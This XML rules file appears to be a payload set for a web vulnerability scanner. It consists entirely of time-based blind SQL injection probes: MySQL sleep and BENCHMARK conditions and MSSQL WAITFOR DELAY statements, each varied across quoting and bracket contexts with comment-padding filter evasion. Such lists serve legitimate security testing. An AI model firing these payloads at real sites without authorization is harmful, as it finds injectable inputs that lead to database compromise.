<?xml version="1.0" encoding="UTF-8"?>
<rules>
    <couple id="1">
        <requests>
            998/**/or/**/if(1=1,sleep(TIME_VAR),1)
            998/**/or/**/if(1=1,BENCHMARK(NUM_VAR,MD5(0x7852554f)),1)
            a'or/**/if(1=1,sleep(TIME_VAR),1)or'a
            a"or/**/if(1=1,sleep(TIME_VAR),1)or"a
            a)or/**/if(1=1,sleep(TIME_VAR),1)or(a
            a')or/**/if(1=1,sleep(TIME_VAR),1)or('a
            a")or/**/if(1=1,sleep(TIME_VAR),1)or("a
            a%'or/**/if(1=1,sleep(TIME_VAR),1)or'%a
            a%"or/**/if(1=1,sleep(TIME_VAR),1)or"%a
            a%')or/**/if(1=1,sleep(TIME_VAR),1)or('%a
            998;WAITFOR DELAY '00:00:TIME_VAR';--
            a';WAITFOR DELAY '00:00:TIME_VAR';--
            a";WAITFOR DELAY '00:00:TIME_VAR';--
            a);WAITFOR DELAY '00:00:TIME_VAR';--
            a');WAITFOR DELAY '00:00:TIME_VAR';--
            a");WAITFOR DELAY '00:00:TIME_VAR';--
            a%';WAITFOR DELAY '00:00:TIME_VAR';--
            a%";WAITFOR DELAY '00:00:TIME_VAR';--
            a%');WAITFOR DELAY '00:00:TIME_VAR';--
        </requests>
    </couple>
</rules>